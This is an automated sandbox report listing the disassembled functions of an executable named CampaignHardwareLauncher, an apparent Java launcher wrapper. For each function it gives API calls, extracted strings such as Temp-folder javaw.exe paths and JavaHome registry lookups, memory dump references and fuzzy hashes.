                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$fprintfmemset$CurrentDirectoryErrorFindLastLoadLock_chdirstrcatstrlenstrncpy
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher$Resource %d:%s$Working dir:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 422477114-348739452
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9c9ccb99f420a877555200c07f2862f7891259c708e168cf86730445fea71b0e
                                                                                                                                                                                                                                                                                                                • Instruction ID: 349f221890d6d40fe71c0e96cafd37487ebf52b12bf3dfd57c186abffd885e97
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c9ccb99f420a877555200c07f2862f7891259c708e168cf86730445fea71b0e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1416BB19087119BE700AF29D58135EBFE4EF84344F01883EE989A7381D7389994CB8A
                                                                                                                                                                                                                                                                                                                Function 004051E0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00405211
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00405228
                                                                                                                                                                                                                                                                                                                • FindResourceExA.KERNEL32(?,00000000,?), ref: 00405250
                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,?,?,00406514), ref: 0040526D
                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(?,?,?,?,?,00406514), ref: 0040527C
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 004052C8
                                                                                                                                                                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32 ref: 004052EC
                                                                                                                                                                                                                                                                                                                • strtok.MSVCRT(?,?,?,?,00406514), ref: 004052FF
                                                                                                                                                                                                                                                                                                                • strchr.MSVCRT ref: 00405316
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 0040535A
                                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00406514), ref: 00405373
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$fprintfmemset$EnvironmentErrorFindLastLoadLockVariablestrchrstrtok
                                                                                                                                                                                                                                                                                                                • String ID: Resource %d:%s$Set var:%s = %s
                                                                                                                                                                                                                                                                                                                • API String ID: 301265589-2172967655
                                                                                                                                                                                                                                                                                                                • Opcode ID: 269e6b674d12423d849caec9e5e778c3ff3d2c18b953fcfb33869b71bd7f8dc3
                                                                                                                                                                                                                                                                                                                • Instruction ID: afa5dd9bf5237a591f145b88366e3ef618c797e9271656589243b0a106b18b75
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 269e6b674d12423d849caec9e5e778c3ff3d2c18b953fcfb33869b71bd7f8dc3
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA4138B0A087019BD710AF2AD58035FBBE4EF88340F41C87EE489A7391D738D9559F9A
                                                                                                                                                                                                                                                                                                                Function 004050D0 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 79stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Error:%s, xrefs: 0040518B
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe, xrefs: 004050F1
                                                                                                                                                                                                                                                                                                                • appendToPathVar failed., xrefs: 00405186
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strlen$EnvironmentVariablememset$fprintfstrcatstrcpy
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$Error:%s$appendToPathVar failed.
                                                                                                                                                                                                                                                                                                                • API String ID: 495583820-2956334326
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1bd0987b0e2fc78d473a59205c3eea85c459be8ceac31c8754d4a8f2c5af2878
                                                                                                                                                                                                                                                                                                                • Instruction ID: f6e45bb88e98a1b81569ded4109919bd0ed7862b498e3da174d31cb25c7df640
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bd0987b0e2fc78d473a59205c3eea85c459be8ceac31c8754d4a8f2c5af2878
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 232161B5A087109AD710AF2AD44016FBBE5EFC4704F42C43FE489AB391D73C88528B8A
                                                                                                                                                                                                                                                                                                                Function 00404040 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 155stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe, xrefs: 004041A5
                                                                                                                                                                                                                                                                                                                • Runtime used:%s (%s-bit), xrefs: 004041DF
                                                                                                                                                                                                                                                                                                                • Resource %d:%s, xrefs: 0040428D
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657, xrefs: 004041AC
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLockatoifprintfstrcpy
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$Resource %d:%s$Runtime used:%s (%s-bit)
                                                                                                                                                                                                                                                                                                                • API String ID: 1856142485-1479973903
                                                                                                                                                                                                                                                                                                                • Opcode ID: d297cc4e5c952a856f3d68dfdf06d37a651345b527a0279046be52caef7b7906
                                                                                                                                                                                                                                                                                                                • Instruction ID: 209fe916da85df5c911ae4276ce2f96064c2a1019c36ad74d5d97ab76ae223e1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d297cc4e5c952a856f3d68dfdf06d37a651345b527a0279046be52caef7b7906
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8513AB0A083059BD704AF65D54436EBBE1ABC4304F01C87EE989AB3D2D77D9C919B4A
                                                                                                                                                                                                                                                                                                                Function 004039F1 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 103synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$ErrorLastfprintf$CreateFindLoadLockMutexmemset
                                                                                                                                                                                                                                                                                                                • String ID: Error:%s$Instance already exists.$Resource %d:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 1676011544-3441027790
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5d703d892fcee4d035bb5678ce239c4aadbc0211198db526eb703aee52715d62
                                                                                                                                                                                                                                                                                                                • Instruction ID: 63ebb8a2186d1c087548a531fdd3118c811b0fdf88078b365d510e972c39d1b2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d703d892fcee4d035bb5678ce239c4aadbc0211198db526eb703aee52715d62
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E414F70A083059BDB14EF39D58135ABBE4AB84344F00C87EE48EE73C1E678D9959F56
                                                                                                                                                                                                                                                                                                                Function 004027A0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96registrystringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • jre, xrefs: 004028D5
                                                                                                                                                                                                                                                                                                                • JavaHome, xrefs: 00402872
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657, xrefs: 0040290A
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: memset$CloseOpenQueryValuestrcatstrcpystrlen
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$JavaHome$jre
                                                                                                                                                                                                                                                                                                                • API String ID: 2991842512-3807237096
                                                                                                                                                                                                                                                                                                                • Opcode ID: d8b368d274ae85d4bc000698528c95442d51d74e1ab4d3ee601e9f643d251c95
                                                                                                                                                                                                                                                                                                                • Instruction ID: f9c37e86e1fa10c1b6e9cf4516faf301a59072f01b137ca7bee1a517f153a641
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8b368d274ae85d4bc000698528c95442d51d74e1ab4d3ee601e9f643d251c95
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A4152B5D047159BD710EF29C94425ABBE0EF84310F01C5BEE88DA7381D7789A84CF86
                                                                                                                                                                                                                                                                                                                Function 00404069 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe, xrefs: 004041A5
                                                                                                                                                                                                                                                                                                                • Runtime used:%s (%s-bit), xrefs: 004041DF
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657, xrefs: 004041AC
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$fprintf$ErrorFindLastLoadLockatoistrcpy
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$Runtime used:%s (%s-bit)
                                                                                                                                                                                                                                                                                                                • API String ID: 440416407-3008814978
                                                                                                                                                                                                                                                                                                                • Opcode ID: b3bc536126c4a8c1264af20974626aece3c182a84d0fe9925ec699f1c1c00d30
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5389436385b8e7cd97168d55a14ed6d8c30c170912d26635384efc32abc192e5
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3bc536126c4a8c1264af20974626aece3c182a84d0fe9925ec699f1c1c00d30
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3415CB0A043019BD714AF25D58436EBBE1ABC4304F05C87ED989AB3D2D77D9C918B4A
                                                                                                                                                                                                                                                                                                                Function 00402829 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 64stringregistryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • jre, xrefs: 004028D5
                                                                                                                                                                                                                                                                                                                • JavaHome, xrefs: 00402872
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657, xrefs: 0040290A
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseQueryValuememsetstrcatstrcpystrlen
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$JavaHome$jre
                                                                                                                                                                                                                                                                                                                • API String ID: 2049115317-3807237096
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5ea3d1e5677a1b9a5e222b99d69bfb2b1b3225a46dc7237ee8f34001a989facb
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0f7c0f34ce8200dd43c2f0bb0ff6e98dc681f3c32799e7a142d2370fabdcc0ea
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ea3d1e5677a1b9a5e222b99d69bfb2b1b3225a46dc7237ee8f34001a989facb
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB217F759087158AD710EF29C58439ABBE1EF84304F05C9BEE58967381D7789A84CB86
                                                                                                                                                                                                                                                                                                                Function 00402CB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLockatoifprintf
                                                                                                                                                                                                                                                                                                                • String ID: Resource %d:%s$`O@
                                                                                                                                                                                                                                                                                                                • API String ID: 2193512306-2494596910
                                                                                                                                                                                                                                                                                                                • Opcode ID: d2c659763aea7fa65e5a142a8afab7499bcdc8dbce1d9b0d6845306160327ef1
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0e451c3d1c8705976eb6372eae49d11802872584f9afc5ab120ed64a9f793ad4
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2c659763aea7fa65e5a142a8afab7499bcdc8dbce1d9b0d6845306160327ef1
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C4151709083059BDB149F29D68426EBBE1EF84300F14847FD885B73D0D6B8DD519B8A
                                                                                                                                                                                                                                                                                                                Function 004022B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$atoi$ErrorFindLastLoadLockfprintf
                                                                                                                                                                                                                                                                                                                • String ID: Resource %d:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 1405122715-3770364717
                                                                                                                                                                                                                                                                                                                • Opcode ID: 860e33d9464aaac1aaf4294ce0ce0efbf730c1f33b9003797695dbf45b4547a1
                                                                                                                                                                                                                                                                                                                • Instruction ID: 173d0b95324560bc3b63ac67752d65b29fca71815bb9e03dc755f331b579f335
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 860e33d9464aaac1aaf4294ce0ce0efbf730c1f33b9003797695dbf45b4547a1
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B21B2759083018BDB14EF3AD58076FBBE0AF84340F01883EE989A7391D73CD8658B96
                                                                                                                                                                                                                                                                                                                Function 004021A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$ErrorFindLastLoadLockfprintf
                                                                                                                                                                                                                                                                                                                • String ID: Resource %d:%s$true
                                                                                                                                                                                                                                                                                                                • API String ID: 2300709556-1650570159
                                                                                                                                                                                                                                                                                                                • Opcode ID: 81dd6341af696f5ba0067316c7a2603a014bd5558d3fa65d953e464f06248ab3
                                                                                                                                                                                                                                                                                                                • Instruction ID: edd0d00bdcf57973877bd5b19408a799ab47b92a6fbc58d7c0a8dfc23e37736a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81dd6341af696f5ba0067316c7a2603a014bd5558d3fa65d953e464f06248ab3
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA21FB72A083155BDB10AF79D54436BBBE4FF80350F05847FE989A73C0D639DA148B95
                                                                                                                                                                                                                                                                                                                Function 00401DC5 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AddressCurrentHandleModuleProcProcessfprintf
                                                                                                                                                                                                                                                                                                                • String ID: IsWow64Process$WOW64:%s$yes
                                                                                                                                                                                                                                                                                                                • API String ID: 24026888-2072328098
                                                                                                                                                                                                                                                                                                                • Opcode ID: 79cba90a5c32919940d47014e4f11db2286ddd08fea7034ebff4aa08fe6649a9
